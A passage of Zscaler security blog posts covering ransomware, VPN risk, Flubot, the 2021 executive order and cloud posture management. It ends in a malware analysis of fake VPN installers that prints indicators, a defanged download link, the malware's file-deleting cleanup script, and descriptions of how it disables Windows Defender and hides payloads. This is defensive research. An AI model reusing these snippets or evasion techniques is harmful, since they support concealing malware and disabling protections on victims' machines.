plan to implement Zero Trust Architecture.” Prevention is a lot less expensive than mitigating attack aftermath. It is easy to see that the loss of revenue from unplanned downtime far exceeds any investment in defending against such attacks. Why was Norsk Hydro’s response to a ransomware attack the gold standard? Ransomware attacks can be mitigated and prevented. Companies like Norsk Hydro have dealt with such attacks in the past and shared the wisdom with the world. What did they do? Norsk Hydro did not pay the ransom. The company went public with the news of the attack and was transparent about its response plan. The company reported the attack to authorities and worked closely with the security industry to prevent attacks on other companies. Norsk Hydro used the opportunity to rebuild, redesign, and strengthen its security and infrastructure. The company is not in denial about the likelihood of future attacks. Even with the best planning, the reality of a successful attack is much more difficult. For example, Norsk Hydro couldn’t use any of the printers to print safety procedures for plant staff. “Had Hydro not already moved communications to a managed cloud service like O365, the situation would have been more grave.” - Chief Financial Officer (CFO), Eivind Kallevik. What should your organization do to plan and prevent ransomware attacks? Assess the business risk of your IT and OT architecture and reduce your attack surface: Don’t go directly into ICS threat monitoring without analyzing the entire attack surface. Ask the right questions when assessing your security posture. Do you have a flat network? Are your IT and OT networks sharing the same resources (e.g., domain controllers)? Do your IT security solutions from different vendors natively work together (like your secure web gateway integrating with your endpoint security and SIEM solution) to break the kill chain? Consider extending zero trust to your OT environments. Attackers cannot get to systems they cannot see on the open internet. Air-gapped OT networks do not serve the business needs: Allow internet access for ICS workstations through browser isolation. ICS employees with two laptops can create complexity that leads to security issues. Replace VPNs with zero trust network access (ZTNA) using a software-defined perimeter approach for remote access of your OT systems. Apply segmentation: Segment the control, management, and IIoT sensor networks in OT environments. Don’t aim for full micro-segmentation, as there is not enough downtime on the OT network to implement it. Protecting the intersection of OT and IT will yield the most benefits. Use the cloud to your advantage: Learn from Norsk Hydro's experience and move as many functions into the cloud. This allows for a faster recovery and better protection of critical systems. Secure Access Service Edge (SASE)-based security implementation is an easy way to reduce your ICS network’s attack surface and complexity. In the SolarWinds attack, an intern’s weak internal password for privileged software led to the massive breach of 1000s of enterprises and government organizations, jeopardizing national security. The shared passwords used in the water processing plant in Oldsmar risked the lives of an entire city. The recent executive order demonstrates a commitment to improving the security posture of United States’ critical infrastructures. Since private companies manage much of that, one would hope the order extends to them as well. The actions of companies handling critical infrastructure affect millions of people. Companies responsible for critical infrastructure must use the best security practices in order to ensure public safety and well-being. Tue, 25 May 2021 08:00:02 -0700 Deepak Patel Got VPN? It’s Only a Matter of Time Before You’re the Next Cyberattack Headline. This post also appeared on LinkedIn. Legacy VPN technology puts business operations at risk Listen in as we discuss this and many more topics on the podcast The CISO's Gambit. Virtual Private Network (VPN) technology carries risk. By design, a VPN effectively extends your network to a remote endpoint, or in the case of a fully remote workforce, to thousands or tens of thousands of remote endpoints. But a worse risk—one that isn’t often talked about—is that the VPN service itself is exposed to the internet, inviting attack. The VPN was designed more than 25 years ago. Despite the performance limitations VPNs impose and the enterprise-threat vulnerabilities they introduce, VPNs remain a commonly employed method for enabling remote access. They are easy to set up, often included with firewall subscriptions, and, once up and running, relatively straightforward to maintain. And though VPNs promise a secure connection from a remote endpoint to the destination gateway, the VPN itself is exposed, and vulnerable to direct internet-based attacks. Across all industries and verticals, VPN services pose a significant risk to organizations. It’s the legacy VPN-based architecture that's the real issue. The risk is significant, and that’s an understatement. Let’s look at some recent examples of exploited VPN services. The first is a newly-disclosed critical authentication bypass vulnerability in Pulse Connect Secure, a widely-used SSL remote-access solution. Threat intel reporting indicates this vulnerability is being actively exploited by threat actors, and could be leveraged to obtain access to internal networks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued Emergency Directive 21-03, “Mitigate Pulse Connect Secure Product Vulnerabilities” requiring all Federal Agencies to identify and mitigate the vulnerability (CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the most recently disclosed CVE-2021-22893) by April 23, 2021. Second, FBI and CISA issued a joint cybersecurity advisory that nation-state threat actors have been observed exploiting vulnerabilities in Fortinet SSL VPN (CVE 2018-13379, CVE-2020-12812, and CVE-2019-5591) to gain access to multiple government, commercial, and technology services networks. Once initial access to the network is obtained, additional attacks using traditional exploitation techniques are used to propagate and propagate access. Right now, organizations around the world are in a frantic race to patch Pulse Secure vulnerabilities before threat actors can exploit them. Just a few weeks ago, organizations that used Fortinet VPN hardware were in the same situation. In the past two years, all of the leading VPN security appliance vendors—Netscaler, Palo Alto Networks, Cisco, Pulse Secure—have acknowledged critical and remotely exploitable vulnerabilities in their public-facing remote-access/VPN services. This is why it is critical for agencies and organizations to embrace security transformation and move away from legacy VPN-based architectures for remote access. Time is not on your side. Whenever a new exploit is discovered, the race is on...for both good and bad actors. Exploit developers work to develop malware for proof-of-concept attacks, and/or to be integrated into their exploit toolkit. Meanwhile, customers scurry to implement patches, vendor fixes, hardware upgrades, or potentially risk-offsetting compensating controls to mitigate exposure. These flaws aren’t that difficult to exploit. APT actors around the world can pump out exploit code very quickly, but even an unskilled attacker can use an automated exploit tool like Metasploit / Rapid7, or Core Impact if exploit code is publicly available to compromise and gain access to a targeted network. To make matters worse, these vulnerabilities are just the ones we know about. I am more concerned about the ones that haven’t yet been disclosed. Just because a public disclosure isn’t out for a particular remote-access vendor’s solution doesn’t mean that hardware-based VPN solution is safe from attack. Offensive cyber teams around the world (and yes, in the United States too) work around the clock to discover the next remotely-exploitable zero-day vulnerability. With the COVID-imposed advent of fully-remote workforces, VPN targets are high-value, especially for those attackers that have full government backing and the resources to discover exploitable flaws. Most vendors work diligently to keep up with the onslaught of attacks. But it’s not enough for enterprise VPN users. Once a critical vulnerability has been disclosed, you’re likely already behind the curve, and presumably already compromised. A moderately-skilled pen tester can easily exploit these security holes, use them to breach your network, and leverage them to move throughout your environment. But it’s not just moderately skilled attackers that you have to worry about: MITRE currently tracks 110 groups that are linked to a cluster of adversary activity exploiting VPN services. Imagine the extent to which an advanced state-sponsored actor could leverage these remotely exploitable vulnerabilities. Eliminate the VPN attack surface to reduce business risk. According to the Zscaler 2021 VPN Risk Report: 93% of companies are still employing VPN services, yet 94% are aware that cybercriminals are targeting VPNs to gain access to network resources. 72% of organizations are concerned that VPN may jeopardize IT’s ability to keep their environments secure. 67% of enterprises are considering a remote access alternative to a traditional VPN. VPNs are a significant risk to your business. At the end of the day, users need to access applications, not become an extension of the corporate network. There is a better way to secure work-from-anywhere connectivity that eliminates risk and enhances user experience. In a reverse proxy-based security architecture, your apps are never exposed to direct internet-based attacks, and you eliminate the risk that a sophisticated threat actor will exploit your legacy VPN remote access solution. Thu, 27 May 2021 10:38:12 -0700 Danny Connelly Zscaler Protections Against Flubot Banking Malware A huge wave of the Flubot malware has been making its rounds in the wild, primarily targeting users in Europe -- particularly the UK -- and in the US. Flubot is an Android banking malware which lures victims to install the app, eventually stealing victim's bank credentials. Flubot has a complete list of capabilities, but features overlay attack capabilities most prominently. It also holds capability to bypass financial institutions' multi-factor authentication security features. According to Threatpost, “The U.K.’s National Cyber Security Centre (NCSC) has issued security guidance about how to identify and remove FluBot malware, while network providers including Three and Vodafone have also issued warnings to users over the text message attacks”. Initial Phase Flubot's infection cycle starts with an SMS message luring victims by stating they have either missed their parcel or a new parcel is arriving. The SMS message contains a malicious link, which redirects users to a compromised website that downloads an Android banking malware. Figure 1 : Flubot Smshing Link (src: The downloaded app, Flubot, portrays itself as one of the delivery apps from either “Fedex,” “DHL”, or “Correos”. And in some cases, as “Chrome”. Figure 2 : Malware Icons Features Flubot is a typical Android Banking malware, which consists of following key features: Steals SMS messages Steals Contacts Spreads itself by messaging to contact list Reads notifications Gets list of installed applications Uses Accessibility Services Deletes apps from compromised device Performs calls Steals Credit Card information using fake system overlays Some of the unique features include using Domain Generation Algorithm (DGA) to contact command and control (C&C) servers and encrypting part of the communication sent to C&C servers using RSA encryption. It can also disable Google Play Protect via Android’s Accessibility feature. Once installed, the malware keeps a watch on the application opened by the victim. If the app turns out to be one of the targeted banking apps, it shows a fake overlay screen to the victim and eventually steals credentials. Flubot also has the capability to steal credit card information by displaying a fake Google verification page. Figure 3 : Credit Card Theft In-depth analysis of Flubot malware was done by Prodaft and can be found here (pdf) Zscaler Coverage Zscaler’s Defense-In-Depth approach prevents the infection at each step, eventually bringing down the complete attack kill-chain. References to Zscaler Threat Library and Flubot definitions can be found here. As seen in the screenshot below, Zscaler’s advanced sandbox detects all the Flubot variants with utmost precision. Figure 4 : Zscaler Cloud Sandbox Detections. Conclusion Due to the ubiquitous nature of the Android operating system, attacks on its users are inevitable and will keep increasing at a rapid pace. Android users should always be wary of the presence of mobile malware. Malware such as Flubot have full potential to compromise victims with features like stealing banking credentials and bypass multi-factor security measures. It is always advisable to stay away from third-party sources distributing Android apps, and to distrust any random links presented to you via email and/or SMS messages. Zscaler customers are protected from such types of attacks. The Zscaler Security team, ThreatLabZ, provides proactive coverage against advanced threats targeting Android banking apps, such as Flubot. ThreatLabz also tracks various Android malware families along with advanced APT (Advanced Persistent Threats) pertaining to Android ecosystem and ensures coverage for all the latest malicious indicators. Thu, 27 May 2021 07:46:36 -0700 Shivang Desai The Colonial Pipeline Cyberattack and The Executive Order: A CISO’s Perspective This post also appeared on LinkedIn. The ransomware event at Colonial Pipeline highlights the need for major cyber improvements across the public and private sectors. It was likely the impetus behind the Biden Administration issuing the much-anticipated Executive Order on Improving the Nation’s Cybersecurity on May 12. This executive order offers aggressive actions and goals towards improving the cybersecurity posture of the national infrastructure. My initial reaction: THANK YOU! The Executive Order was under development for some time and certainly isn’t only about Colonial Pipeline or the SolarWinds crises. It’s a reaction to the growing gap between public infrastructure cybersecurity postures and the possible damage from cyber threats to public health, services, and safety. Ransomware is a growing problem everywhere. In the past four days, we’ve seen Ireland’s health service IT systems taken down by ransomware, and—after stating that it was dropping insurance reimbursement for ransomware extortion payments—AXA Partners was hit as well. The executive order promotes game-changing strategies and specific measures for fighting the risk and damage from cyber threats in the United States. Sharing threat intel We still don’t know the details of the attack vector, timeline, or indicators of compromise (IOC) for the Colonial Pipeline breach. That’s a problem. Sharing threat intelligence is critically important for several reasons, but the most important one is that knowing the tactics, techniques, and procedures (TTPs) helps incident responders uncover attacks that otherwise wouldn’t have been detected and implement preventive measures. The Cybersecurity and Infrastructure Security Agency (CISA), which includes the National Cybersecurity and Communications Integration Center (NCCIC) and Hunt and Incident Response Team (HIRT) teams, have dedicated experts ready to manage and assist with events like this. The Colonial Pipeline is a critical infrastructure, and CISA’s mission is specifically to address cyber issues affecting national security. EO Section 2, “Removing Barriers to Sharing Threat Information,” highlights the importance of CISA’s role and the need to report breaches in an accurate and timely manner. While the FBI attributed the attack to DarkSide—a group known for exploiting public-facing services—there are still many unanswered questions. We do know that DarkSide exfiltrated nearly 100GB of data and threatened to publish it on the Internet, in addition to encrypting it and making it unusable. This is known as a “double-extortion attack” in that it provides the attacker with more ransom leverage: “We’ll give you the key to unlock your on-premises data, but if you think you can just restore the data via backups, we’ll release that data into the wild.” Zscaler’s ThreatLabZ team recently published a detailed report focused on the increase of double extortion ransomware. It’s time to make the shift Given DarkSide’s modus operandi, we can assume they got their foothold at Colonial via a remotely exploitable vulnerability in a public-facing application. Figure 1: Darkside - MITRE ATT&CK Tactics and Techniques But there are many different vectors (phishing, driveby download, malicious USB drive, etc.) that could lead to the same result. Modernizing cybersecurity infrastructure, security posture, and standards compliance across public and private entities—especially when both work together to manage critical infrastructure—is an immediate priority. The new executive order calls for strengthening incident detection, response, and mitigation to reduce the likelihood that a single security incident doesn’t become a significant security event. Organizations must shift from legacy network-centric security to successfully combat today’s threats: attackers are likely targeting you right now. Zero Trust architectures prevent cyberattacks from propagating laterally across an organization’s IT infrastructure (a fact I highlighted recently). Section 3 of the executive order, “Modernizing Federal Government Cybersecurity,” is a crucial component. It explains how the move to cloud (IaaS, PaaS, SaaS) technologies, remote work, hybrid cloud/on-premises environments, and IT systems that process data or operate machinery (like IoT/OT devices) requires significant investments in zero trust-based solutions to modernize cybersecurity capabilities. Each agency must develop a plan to implement a zero trust architecture that aligns with NIST 800-207 and submit an implementation timeline. But what is zero trust? “Within 60 days of the date of this order, the head of each agency shall…develop a plan to implement Zero Trust Architecture.” - The White House I get to speak to cybersecurity leaders across many industries. I often ask what they think Zero Trust means. I hear a lot of different answers depending on context and concerns. Zero Trust has evolved. It encompasses ten years of security best practices designed to protect the cloud services, software, and infrastructure that makes digital transformation a plausible reality. At its core, it means connecting users directly to applications on a least-privileged or default-deny basis. Implementing “zero trust” access using traditional network-centric security capabilities is difficult to manage and maintain. Overseeing the access control lists (ACL) and firewall rulesets needed for applications to function without opening massive security holes is problematic for businesses needing agility and resilience. Network-centric security technologies also don’t adequately prevent lateral movement. Why? Firewalls live at the perimeter of a network: Once you’re through, they don’t protect the rest of the systems. This means using internal firewalls, network segmentation, zones, VLANs, etc., to control internal traffic. Configuring, troubleshooting, and maintaining these rulesets often results in overly permissive access to internal applications. What’s the point of implementing network segmentation if holes in security rules allow NetBios/SMB or remote desktop protocol (RDP) to communicate bi-directionally with Active Directory (AD) and other core support services? We must shift and abandon network-centric security approaches and embrace zero trust solutions to defend against today’s threats successfully. The latest executive order includes a definition of Zero Trust architectures in Section 10, “Definitions,” and references the NIST Zero Trust Architecture standard (NIST 800-207). TIC 3.0 and NIST 800-207 guidance has opened the door for agencies to adopt modern, cloud-based zero trust security solutions that cover cloud technologies (IaaS, PaaS, SaaS), on-premise or hybrid environments, and IT systems that process data or operate machinery (OT devices). Containment is critical There is an invisible and never-ending chess match between cyber attackers and IT security. The more effective the cybersecurity capabilities are, the harder attackers work to develop new and more evasive attack techniques. While phishing is the most common attack vector for threat actors to obtain initial access to an agency endpoint, another common attack vector is vulnerabilities in public-facing applications exposed to the internet. Whether it be a vulnerability on a VPN concentrator or within a web application, quickly containing an attack prevents lateral movement and mitigates the damage from a breach. Again, I was pleased to see Section 7, “Improving Detection of Cybersecurity Vulnerabilities and Incidents on Federal Government Networks,” included in the executive order. It calls for a government-wide endpoint detection and response (EDR) capability. The speed at which you can identify and contain a compromised endpoint, node, account, etc., determines the severity and extent of a breach. This isn’t possible unless you leverage EDR capabilities that use integrated AI/ML to facilitate automated responses. The challenge ahead The Colonial Pipeline attack and other events over the last few weeks are unfortunate and demonstrate weaknesses in the current state of our cybersecurity. But this is an excellent opportunity for those that understand the challenges to make a shift and implement the cybersecurity capabilities necessary to protect and defend enterprises and infrastructures from dangerous attacks effectively. The technology is ready. The real challenge is shifting the people’s mindset and company culture to embrace better cybersecurity and digital transformation. The new Biden Administration executive order tells the nation that it’s time to modernize cybersecurity across the board and includes aggressive actions for what’s needed: abandon old thinking, modernize outdated security capabilities, and adopt zero trust architectures. To those who helped create the “Executive Order to Improve the Nation’s Cyber Security,” well done! For the frontline cyberwarriors who selflessly dedicate their career to protect the mission, thanks for your dedicated service, and keep fighting the good fight! Tue, 18 May 2021 08:00:01 -0700 Danny Connelly Zscaler is the 2021 Zero Trust Champion at Microsoft’s 20/20 Partner Awards Ceremony In my previous blog, I was proud to share that Zscaler was nominated for two awards from the Microsoft community, including the Zero Trust Champion of the year. On May 12, Microsoft announced the award winners at its 20/20 Partner Awards ceremony, a prestigious event recognizing industry excellence in a number of key areas. I couldn’t be more grateful to the Microsoft community to announce that Zscaler has won the Zero Trust Champion of the Year award, beating out a strong field of competitors. This award validates our forward-looking vision and the significant innovation behind our zero trust architecture, which is reimagining how leading enterprises safeguard their digital business in today’s mobile and cloud-first world. This recognition comes on the heels of the landmark Executive Order on Federal Cybersecurity from the Biden Administration that puts zero trust at the forefront of both public and private efforts to transform security to become more agile, resilient, and significantly reduce risk. We believe wholeheartedly in three fundamental principles of zero trust: Zero trust has generated a massive amount of noise across the industry for good reason—it’s the only way to disrupt the attack equation and get ahead of highly intelligent, rapidly evolving adversaries. With users, data, and applications everywhere, there needs to be a different approach; one that is cloud-native, optimized for the needs of the modern enterprise, and adaptable to the ever-changing threat landscape. Zscaler believes a true zero trust architecture must be built on the following three tenets: Zero network access: connect users to apps, not corporate networks to prevent lateral movement. Zero attack surface: make apps invisible so they can’t be attacked. Zero passthrough connections: deny all privileges; utilize a proxy architecture for better cyberthreat prevention and data protection. It has become evident that legacy network security architectures can’t deliver on the promise of zero trust, as adapting traditional solutions to this new era introduces massive complexity and cost without improving security. The Microsoft Zero Trust Champion of the Year award recognizes Zscaler’s approach to delivering a comprehensive zero trust architecture, one made all the more meaningful by being selected by the Microsoft Intelligent Security Association (MISA) members who were solely responsible for voting on this year’s winners. Together with Microsoft, we will continue to deliver exceptional security outcomes to our customers, built on a foundation of the industry’s leading zero trust architecture, the Zscaler Zero Trust Exchange. Thank you to the MISA members and Microsoft for this honor. Recognition amongst our peers in the industry is humbling, and we are grateful for your confidence in our strategy and execution of providing zero trust to our customers. Don’t miss our joint breakout session at Zenith Live In a few weeks, Zscaler will be hosting its virtual Zenith Live conference, with this year’s theme being Full Cloud Ahead. In our joint session, you will hear from experts at Zscaler and Microsoft about actionable cloud-based zero trust solutions and crucial strategies to stay ahead of today’s most advanced threats. Our experts will discuss the strategies and technologies required for a true zero trust architecture and how you can make zero trust a reality for your organization. Register for Zenith Live here: We hope to see you there! Thank you again to Microsoft and the Microsoft Intelligent Security Association for this opportunity and recognition. Mon, 17 May 2021 15:07:00 -0700 Punit Minocha How CSPM Secures Your Public Multicloud Environment Public cloud brings tremendous advantages to enterprise IT teams, including significant flexibility and agility, along with economies of scale. It allows the organization to set up the required infrastructure much faster than on-premises and provides unmatched business scalability and extra security capabilities. The benefits of agility and efficiency come with the challenge of securing assets and workloads in the cloud. The rapid adoption of public clouds—AWS, Azure, GCP—and an increasing number of cloud services, has created an explosion of data and identity complexity with unmanaged risk. Why is it essential to maintain a secure posture? Despite high-profile data breach incidents, the disciplined use of the public cloud is secure. The secret to adequate public cloud security is improving the overall security posture. Secure posture has an inverse relationship with cybersecurity risk; as security posture improves, risk decreases. Cloud infrastructures are constantly changing; enterprises need to continuously monitor multicloud environments and identify gaps between stated security policies and actual security posture. Proper security not only reduces the possibility of a data breach, but it also minimizes the damage if an attack was successful in gaining access to your cloud environment. When a major organization has a security breach, it always hits the headlines. Security breach examples include the following: The Capital One data breach in 2019 was one of the most devastating data breaches of all time. The attack occurred due to a misconfiguration error at the firewall’s application layer. Impact: 80,000 bank account numbers; exposure of more than a million records with personal information, including Social Security number. The Instagram breach involved a partner, Chtrbox, that had left a database exposed on Amazon Web Services. Impact: 50 million "influencer" records exposed. Maintaining a secure posture ensures that enterprises have a systematic approach toward risk and possible exposure. It also establishes a guideline for prioritizing risks and how to respond to and remediate risk. Hence, CloudOps and security teams tasked with securing the organization’s multicloud environments have focused on Cloud Security Posture Management or CSPM. CSPM is described as “a continuous process of cloud security improvement and adaptation to reduce the likelihood of a successful attack.” Keeping up with the rate of change There are many elements to public cloud security posture management. Considering the above factors, we have outlined a few of the best practices to maintain a healthy and secure posture in a public multicloud environment. Gain visibility into disparate, multicloud infrastructure (single pane of glass) Cloud service providers (CSPs) offer native monitoring tools that can be helpful to an extent. Still, they have limitations, especially when it comes to getting detailed context and visibility across multicloud environments. The first step is to get complete, comprehensive visibility into multicloud infrastructure and security posture. Enterprise can’t maintain a security posture without a complete overview of IT assets. They need to discover and track all assets and inventory (both current and historical) with configuration status. Monitor misconfigurations Misconfiguration errors are ranked as the second-most significant cloud security threat. In the competitive cloud environment, CSPs are constantly changing and improving their services. Thousands of settings and configurations increase the likelihood of a human error resulting in misconfiguration. While the attacks are getting more frequent and sophisticated, SecOps teams need to effectively monitor the cloud environment to detect configuration errors, policy violations, and associated risks in multiple accounts, regions, and cloud providers. Automate governance and remediation Continuously monitor cloud security posture against established best security practices and benchmarks, such as those from the Center for Internet Security (CIS) to detect vulnerabilities and policy violations. Benchmark and check cloud resource configurations against popular compliance frameworks such as PCI DSS for retail and HIPAA for healthcare. Set up industry-specific private benchmarks and apply them to specific cloud accounts. Remediate any discovered issues automatically or with minimal manual intervention. Embed compliance checks with existing DevOps deployment (CI/CD) pipelines to detect and correct compliance deficiencies in early-stage testing environments. Team Collaboration Distribute the cloud security responsibility across the organization to critical stakeholders, ensuring security and compliance in a dynamic environment. Implement and enforce policies on cloud ownership, responsibility, and risk acceptance by outlining expectations, significance, and control of cloud use. Prioritize efforts according to security risk and business impact. Focus efforts on issues that can affect critical cloud assets and can publicly expose data or assets. Automatically assign owners/teams to security incidents through ITSMs, such as ServiceNow or Zendesk. Looking ahead Industry trends show a substantial migration of workloads to the public cloud, and the rapid adoption of cloud-based software-as-a-service offerings signifies that it will continue for quite some time. As organizations increase their public cloud footprint, they will encounter cloud-specific risk, security, and compliance threats, which are challenging to address without the right tools and processes. “Nearly all successful attacks on cloud services result from customer misconfiguration, mismanagement, and mistakes. Security and risk management leaders should invest in cloud security posture management processes and tools to proactively identify and remediate these risks." – Gartner Zscaler CSPM can help enterprises maintain a secure posture in a multicloud environment. It helps to continuously monitor cloud risk through identification, prioritization, and remediation based on common frameworks, regulatory requirements, and organization policies. By extending these solutions directly into the development process, security teams can proactively identify and remediate cloud risks before production. Benefits of Zscaler CSPM A complete view of multicloud security posture – Zscaler CSPM provides an “at-a-glance” comprehensive picture of your cloud inventory, the location of assets across global regions, and complete visibility into the public cloud security posture of all assets and resources. Continuous monitoring – Zscaler CSPM continuously monitors and assesses cloud assets and resources for misconfigurations and non-standard deployments. The scan data is synchronized for new and updated assets. The dashboard provides precise analysis and evidence of security and compliance issues and offers remediation methods to mitigate problems. Automated security using REST APIs – Zscaler CSPM fully supports REST APIs for seamless integration with the CI/CD toolchain. It helps DevSecOps teams with real-time assessments of potential risks and exposures so that they can mitigate risks before deploying apps into production. The public multicloud environment has many advantages and, as long as enterprises use it for these advantages, it will continue to be exploited and targeted. However, implementing the right tools and strategies can support the enterprise to maintain a secure cloud posture. Learn more at Wed, 19 May 2021 08:00:02 -0700 Mahesh Nawale Threat Actors Distribute Malicious VPN Apps Masquerading as Popular Vendors Introduction In May 2021, Zscaler ThreatLabZ observed several new domains registered by a threat actor for distribution of spoofed and malicious versions of popular VPN softwares. Threat actors have shifted their tactics, techniques, and procedures (TTPs) to target VPN users over the past year, taking advantage of the increase in remote work and the popularity of VPN applications. We observed this particular actor spoofing VPN applications, such as NordVPN, F-secure Freedom VPN, Avast Secureline VPN, and Hotspot Shield, to distribute the infostealer known as Raccoon stealer. Several lookalike websites containing malicious download links were hosted on domains registered by the actor in May 2021 using the Njalla domain hosting provider. Njalla has been used in the past by advanced persistent threat (APT) actors, such as Lazarus and Sandworm. ThreatLabZ closely monitors the network infrastructure used by these threat actors, which led to the discovery of this campaign. For this blog, we performed a deep-dive technical analysis of the malicious setup files, the evasion techniques used, and the final payload delivered. Attack flow The attack starts when users visit a lookalike website registered by the threat actor to distribute VPN applications. As an example, the domain: vpnnords[.]com was registered by the attacker and used to host the webpage as shown in Figure 1. This page looks almost identical to the homepage of the legitimate NordVPN website. The only difference is that the “Download Free” button on this page leads to the download of a malicious NordVPN setup file hosted on a file-sharing website. The complete list of domains registered by the attacker to target VPN users is included in the IOCs section. Figure 1: Malicious webpage that looks similar to the legitimate NordVPN website Download link of setup file: hxxps://filetransfer[.]io/data-package/tZCy19qQ/download The downloaded file looks like a legitimate setup file of NordVPN—it uses the same file icon and even displays the graphical user interface (GUI) of NordVPN—but performs malicious activities in the background, which we describe in detail in the technical analysis section. Low detection by security vendors All the domains used in this attack and registered by the threat actor have no detection on VirusTotal and all security vendors mark these domains as clean. One such example is shown in Figure 2. Figure 2: No detection for the malicious domain(s) on VirusTotal by security vendors This highlights how this attack has been flying under the radar and the importance of proactive hunting techniques, which helped us discover these domains. Technical analysis For the purpose of technical analysis, we will consider the file with the MD5 hash: e157f55aff49fe53befa3484d5e2b575 Static analysis Similar to the legitimate NordVPN setup file, the fake NordVPN setup is packaged using Inno Installer, but the file structure inside the package is different. Figure 3 below shows the file structure for both legit and fake setup. Figure 3: File structure for Inno-packaged fake and legitimate NordVPN setup files [+] Inside the fake installation package As shown in Figure 3 above, the package contains the following files. Legitimate NordVPN setup – NordVPNSetup.exe. The NordVPNSetup.exe is the latest version of NordVPN with MD5 hash: 4e6183906dfe035954ec0260c573ab03 Seven files for performing different malicious operations. These files are described in more detail in the “Component analysis” section The Inno package installer script – install_script.iss. All the files inside the package are encrypted using a password as defined in the [Setup] section of the installer script Note: The Inno package installer script for the fake NordVPN setup is available in the appendix section [+] Component analysis In this section, we perform a technical analysis of the individual components packaged inside the malicious setup file. Naming convention of component files All the script (VBS and BAT) file components in this package follow a naming convention. The first few characters indicate the purpose of the script followed by an array of random characters appended to it. Example: # STRT indicates starting or initialization STRTbbbn7przuvwav4hbpbps.vbs = “STRT” + “bbbn7przuvwav4hbpbps” + “.vbs” # AVD indicates AV disable AVDbbbn7i3b4ho55ck6raahj.bat = “AVD” + “bbbn7i3b4ho55ck6raahj” + “.bat” # DEL indicates delete the components and cleanup DELbbbn7l3bnchd166d2hhhv.bat = “DEL” + “bbbn7l3bnchd166d2hhhv” + “.bat” VBScript analysis MD5 hash: b5d6f5e514757d7b075ed59d79b8f2e2 Filename: STRTbbbn7przuvwav4hbpbps.vbs This VBScript is big in size because of the inclusion of junk instructions, which declare a lot of variables that are not used anywhere in the code. After cleaning up, the script looks like shown in Figure 4. Figure 4: Cleaned up VBScript. The main purpose of this script is to execute the three BAT files, described in the next section. The VBScript creates a delay between the execution of each BAT script using a random delay parameter, calculated as follows. Dim max,min max=9890 min=4890 Dim RNDM Randomize RNDM=((max)*Rnd+min) BAT files analysis [Component #1: Disable security softwares] MD5 hash: 7924178f4a19db114e1fbb2764b8b409 Filename: AVDbbbn7i3b4ho55ck6raahj.bat This BAT file is mainly responsible for disabling security software on the machine. It specifically targets Windows Defender and Exploit Guard. To disable the security service features, it leverages reg.exe to alter the Windows registry keys specific to Windows Defender and Exploit Guard. In addition, the file disables system services and scheduled tasks related to Windows Defender. Similar to the VBS file, this BAT file is large. This is because long strings of Base64-encoded data are included in the file and the commands are inserted between them, as shown in Figure 5. Figure 5: Commands inserted between Base64-encoded blobs in the BAT file The complete list of commands executed by this BAT file to disable security services and features is included in Appendix. [Component #2: Main] MD5 hash: b3a6b11fcf113f692648bc8f0f3f898e Filename: main.bat This BAT file uses a byte order mark (BOM) in the first two bytes, in which it displays only Unicode characters when the file is opened using Notepad++ or any other text editor. The first two bytes are {0xFF 0xFE} as shown in Figure 6. Figure 6: Byte order mark (BOM) inserted in first two bytes of the BAT file Once we delete these two bytes, we can view the contents successfully with a text editor, such as Notepad++, as shown in Figure 7. Figure 7: Cleaned BAT file The main actions performed by this BAT file are: 1. Creates a temp directory called "extracted" in the current directory 2. Renames the encrypted file.bin to 3. Decrypts and extracts the contents of using the password: "___________7876pwd4897pwd19506___________" 4. Extracts all the components after decrypting and renames to file.bin 5. Executes sihost.exe After further analysis, we discovered that an open-source anti-antivirus obfuscator was used to package the files. This obfuscator will generate a BAT file and package everything using 7zip to create an encrypted and password-protected, multilayer archive file. This GitHub project was used by the threat actor: In our case, the archive file is called file.bin MD5 hash: b2880d44773178644ff13d755e96d5e2 FIlename: file.bin This is an encrypted ZIP archive that, when decrypted, with the password “___________7876pwd4897pwd19506___________” contains the following main components: Sihost.exe - 32-bit .NET Binary [Component #3: Cleanup] MD5 hash: 228c709d87e5ff50e7d5c05b1a7f6c03 Filename: DELbbbn7l3bnchd166d2hhhv.bat Deletes all the components that were used in the initialization stage of the setup. @echo off timeout /T 60 /NOBREAK > Nul Del /f /q "AVDbbbn7i3b4ho55ck6raahj.bat" Del /f /q "STRTbbbn7przuvwav4hbpbps.vbs" Del /f /q "STR2bbbn7przuvwav4hbpbps.vbs" Del /f /q "7z.dll" Del /f /q "7z.exe" Del /f /q "main.bat" Del /f /q "file.bin" Del /f /q "LODbbbn7pkeaxe7obg0ydlex.bat" Del /f /q "DELbbbn7l3bnchd166d2hhhv.bat" Dynamic analysis When the Inno packaged fake NordVPN setup is executed, it extracts the legitimate NordVPN setup file to the path: "%ProgramFiles%\" or "%ProgramFiles(x86)%\", while all the malicious operation-related files are extracted to the path "%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\". As per the [Run] section of the installer Inno script, the legitimate NordVPN setup is executed first, followed by the malicious VBScript execution. Operating in this order prevents the end-user from suspecting that any malicious activity is being performed on the user's machine. Figure 8 below shows the installation window that is displayed to the end-user as a result of legitimate NordVPN setup execution, while the malicious activity is being performed in the background. Figure 8: Installation window shown to the end-user [+] .Net binary analysis As described earlier, the VBS and BAT scripts' execution finally results in dropping and executing the .NET binary with the name, sihost.exe. Similar to all the payloads in the infection chain, the .NET binary is obfuscated and consists of multiple layers that make binary analysis difficult and help to bypass the AV products. // Main binary The main binary has the project name “StarEggControl”. On execution, it loads the next layer binary, which is stored as an image in the resource section with the full resource path “StarEggControl.frmSolucao2.image1” and it is constructed using individual pixel information from the stored image. The code responsible for binary construction is shown in Figure 9 below. Figure 9: Image to binary construction using individual pixels Once the binary construction is complete, the binary is loaded as a runtime module. The module is a .NET DLL with the name SampleUI.dll. Code execution is transferred to this DLL by calling SampleUI.MDI class with three parameters: ugz1: "54776F5061746873" – Encoded resource name for next layer binary ugz3: "59596A6F71" – Encoded key which is used to decrypt the next layer binary projname: “StarEggControl” – Project name of main .NET binary // SampleUI.dll Similar to the previous layer, the SampleUI.dll also loads the next layer binary, which is stored as a bitmap image inside the resources of the main binary itself. The resource name when decoded using the parameter ugz1 is: "TwoPaths" and the full resource path is: “StarEggControl.Resources.TwoPaths”. The next-layer binary is constructed from the retrieved Bitmap image using a custom algorithm implementation that uses XOR operation. The XOR key is derived using the parameter ugz3 which turns out to be "YYjoq". The constructed binary is again loaded as a runtime module, which is also a .NET DLL with the name “公jrxl的A太 wCe”. Code execution is transferred to the DLL by calling the class with the name: “公jrxl的A太 wCe.d司J物rU族家的v行是o.z官司C生bqT的A”. Please note that the class and method names inside the .NET binary contain 